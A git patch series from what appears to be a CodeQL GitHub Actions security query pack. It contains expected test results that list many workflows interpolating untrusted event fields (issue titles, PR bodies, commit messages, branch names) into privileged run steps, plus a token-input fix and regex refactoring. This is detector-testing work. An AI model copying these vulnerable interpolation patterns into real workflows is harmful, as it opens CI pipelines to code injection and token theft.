| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref new file mode 100644 index 00000000000..fbd758b6bd6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/PrivilegedCodeInjection.ql From 5908d6c567601c74b9fc2f684a0c8c811ca4170a Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:23:37 +0100 Subject: [PATCH 0124/1267] Fix tokens --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index f88e3b07850..e8f13962e81 100644 --- a/action.yml +++ b/action.yml @@ -24,7 +24,7 @@ runs: - name: Do something with context shell: bash env: - GITHUB_TOKEN: ${{ github.token }} - GH_TOKEN: ${{ github.token }} + GITHUB_TOKEN: ${{ inputs.token }} + GH_TOKEN: ${{ inputs.token }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 01d8d79e6d36b294d6638bee30ec6809cf96cf6b Mon Sep 17 00:00:00 2001 
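Review bot: `GITHUB_TOKEN` and `GH_TOKEN` in the `Do something with context` step now depend entirely on `inputs.token`, whose declaration sits outside this hunk, so it is not visible whether that input has a default. If it has none, a caller that omits `token` hands `index.js` two empty credentials and the failure only shows up as an API error at run time. Declaring the input with `default: ${{ github.token }}` keeps the previous behaviour for such callers. The input's `description` should also state the minimum permissions the action needs, so callers can pass a narrowly scoped token instead of a broad personal access token.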
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:34:12 +0100 Subject: [PATCH 0125/1267] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d211b8fc2ba..4dd2ab2866e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.2 +version: 0.0.3 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 61ef9d40ab5..90647d42240 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.2 +version: 0.0.3 groups: - actions - queries From 6cb15f06bceaa9c6304743f5e4c6a49015f82c00 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:54:21 +0100 Subject: [PATCH 0126/1267] fix(fn): Apply json wrappers to source regexps --- ql/lib/codeql/actions/Ast.qll | 5 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 18 +++--- .../codeql/actions/dataflow/FlowSources.qll | 18 +++--- .../CWE-094/.github/workflows/json_wrap.yml | 59 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++ 6 files changed, 89 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 4a7ff12b4f9..91612c5836b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -9,6 +9,11 @@ module Utils { .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } + + bindingset[regex] + string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f45565caed7..3fa1769e762 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
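Review bot: The `fromJSON\\(` and `toJSON\\(` alternatives added in `wrapRegexp` match only that exact spelling, while GitHub Actions expressions resolve function names (and, as far as I know, context property names) without regard to case, so a source written with `tojson(...)` or `fromJson(...)` would not be recognised and the query would stay silent on it. Only the tail of `normalizeExpr` is visible here; unless it or the callers fold case elsewhere, prefixing each alternative with the inline flag closes the gap, e.g. `"(?i)toJSON\\(" + regex + "\\)"`. The same literals are carried into the rewritten list in the later `@@ -12,7 +12,11 @@` hunk of the "Remove unnecessary boundary anchors" commit. A one-line QLDoc on `wrapRegexp` stating that it yields three alternative patterns (bare, `fromJSON`-wrapped, `toJSON`-wrapped) would also help callers that pass the result to a matching predicate.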
@@ -813,28 +813,24 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) -} - -bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a586cab4a32..ca1d2163786 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
